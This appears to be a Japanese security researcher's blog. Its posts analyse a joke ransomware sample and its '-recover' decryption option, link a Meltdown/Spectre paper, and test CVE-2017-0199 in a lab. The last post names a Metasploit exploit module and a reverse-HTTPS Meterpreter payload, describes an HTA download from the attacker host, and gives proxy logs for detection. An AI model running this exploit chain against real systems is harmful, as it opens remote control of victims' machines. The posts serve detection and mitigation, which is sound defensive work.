2018年03月04日

「干物妹ランサムウェア」検体の挙動確認

 干物妹ランサムウェアという、怪しげなマルウェアの存在をMalwareHunterTeamさんのつぶやきで知ったので、検体を入手して解析してみました。

 結論からいうと、つぶやきにあるとおり、暗号したファイルの復号が容易であり、ジョークソフトとしか思えない。でも、いわゆるウイルス作成罪(不正指令電磁的記録に関する罪)に該当すると思います。冗談半分だったのかもしれませんが、マルウェアを作成・公開することはやめましょう・・・。

検証環境


[感染パソコンの環境]
  • Windows7 Home Edition SP1 32bit版(VMwareの仮想マシン)
  • Microsoft .NET Framework 4.7.1
[検体情報]
  • ハッシュ値(SHA256): dde7c1c88adce965134af781ad7efa3cb75a4f2cc028b1de2741d05184881602
  • 検知名(トレンドマイクロ): Ransom_Genasom.THBAFH

検証結果

(1)感染時の挙動

検体をエクスプローラでダブルクリックして実行したところ、ドキュメントフォルダ内のテキストファイル(.txt)、ワード文書(.doc)が暗号化されるとともに、拡張子が「.干物妹!」に変更されました。
Screenshot1 infected desktop

(2)復号

検体をコマンドプロンプトから「-recover」オプションを付けて起動したところ、暗号化されたファイルが復号化されました。
Screenshot2 recoverd desktop

(3)解析

検体は.NETアプリケーションであり、ILSpyで解析することでソースコードを確認することができました。
難読化もされておらず、素直なコードです。スクリーンショットには、複号用オプション「-recover」が指定されたか確認するコードが写っています。
Screenshot3 IRSpy

補足

 「干物妹」は、「ひもうと」と読むそうです・・・。勉強になりました。

posted by やまと at 18:26| Comment(0) | 実験日誌

2018年02月01日

CPUの脆弱性MeltdownとSpectreの影響分析

 世間を賑わせているCPUの脆弱性「Meltdown」、「Spectre」で具体的にどのような影響があるのか情報が錯そうしておりましたが、論文などを読み込み、現実的な攻撃シナリオを添付ファイルのとおり整理してみました。
 間違っている部分があれば、ご指摘ください・・・。(ご指摘いただく場合は、一次情報を読み込んだうえでお願いいたします。)

Meltdown_Spectre.pdf (98.3KB)

 なお、本当は技術的詳細をもっと丁寧に記載すべきですが、論文などを読み込むだけで力尽きてしまいましたのでご容赦ください(汗)


posted by やまと at 00:02| Comment(0) | 実験日誌

2017年07月02日

Microsoft Office/WordPadの脆弱性CVE-2017-0199を検証してみた。

 2017年6月27日にウクライナなど世界各地でランサムウェア「petya(ペトヤまたはペチャ)」の感染被害が発生しました。初期感染経路に関する情報は輻輳しておりますが、いくつかのセキュリティベンダーからは、2017年4月に公開された脆弱性CVE-2017-0199が悪用されたとの情報もあります。

 この説が本当だとすると、不審メールの開封や改ざんされたウェブサイトの閲覧により感染することになり、国内においても被害の発生が懸念されます。 そこで、CVE-2017-0199による攻撃発生時にどのような特徴があるのか、また、ログなどから検知できないのか検証してみました。

検証環境


[ソフトウェア]
・攻撃PC:Debian8, Metasploit Framework ver.4.14.28-dev
・被害PC:Windows7 Professional SP1 64bit, Microsoft Office2010 SP2 32bit

[ネットワーク構成]
 攻撃PC(192.168.15.10)
  │
 Firewall(192.168.15.100/192.168.100.100)
  ├ Proxy(192.168.100.50)
 Firewall(192.168.15.101/172.16.0.100)
  │
 被害PC(172.16.0.130)

検証手順

(1)攻撃PCにてmsfconsoleを起動し、エクスプロイトを実行

   exploit: windows/fileformat/office_word_hta
   payload: windows/meterpreter/reverse_https

(2)上記コマンドにて作成された攻撃用ファイル「msf.doc」を被害PCに移動

(3)被害PC上で「msf.doc」をWORDにて開封

検証結果

(1) 検証手順(3)によりWORD文書を開封すると、「この文書は、他のファイルへのリンクが含まれています。リンクされたファイルのデータでこの文書を更新しますか?」というダイアログメッセージが表示されました。

WORD

(2)ダイアログメッセージには、「はい」、「いいえ」、「ヘルプ」の3種類のボタンがありますが、何も操作しなくとも、バックグラウンドで攻撃PCにHTTP接続し、HTAファイルがダウンロードされ実行されました。

(3)HTAファイルの実行により、攻撃PCにmeterpreterセッションが確立され、遠隔操作に成功しました。

Metasploit

[補足]
・「msf.doc」をメールに添付した状態で開封するなど、WORDが「保護されたビュー」で起動した場合は、攻撃が発動しません。ただし、「編集を有効にする」をクリックすると攻撃が発動します。
・Windows7 Home Edition 32bit版にて同様の検証をしたところ、何故か攻撃が成功しませんでした。(原因は不明)

攻撃発生時の特徴

・プロキシログに「hta」ファイルのアクセスログが残ります。なお、ユーザーエージェントはInternet Explorer(デフォルトブラウザ)のものが記録されます。

[攻撃時プロキシログ]

#cat /var/log/squid/access.log
02/Jul/2017:22:34:11 +0900.388   4472 172.16.0.130 TCP_MISS/200 6902 GET http://192.168.15.10/default.hta - DIRECT/192.168.15.10 application/hta "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
02/Jul/2017:22:34:11 +0900.825    139 172.16.0.130 TCP_MISS/200 6850 GET http://192.168.15.10/default.hta - DIRECT/192.168.15.10 application/hta "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
02/Jul/2017:22:34:16 +0900.365   3349 172.16.0.130 TCP_MISS/200 962300 CONNECT 192.168.15.10:443 - DIRECT/192.168.15.10 - "-"

    
※1〜2行目が脆弱性攻撃のログ、3行目がMeterpreterによる遠隔操作セッション確立のログ。
※1〜2行目のログが記録されたとしても、脆弱性攻撃が成功したとは限らない。

感想

・セキュリティパッチを適用することが最善策なのですが、何らかの理由により適用が困難な場合は、プロキシサーバなどでContent-Type「application/hta」を遮断することで、脆弱性攻撃を緩和できるかもしれないと感じました。(私の環境では、通常のブラウジングでHTAファイルにアクセスすることがないため、対策による影響も小さいのかなと思っています。)

posted by やまと at 23:37| Comment(0) | 実験日誌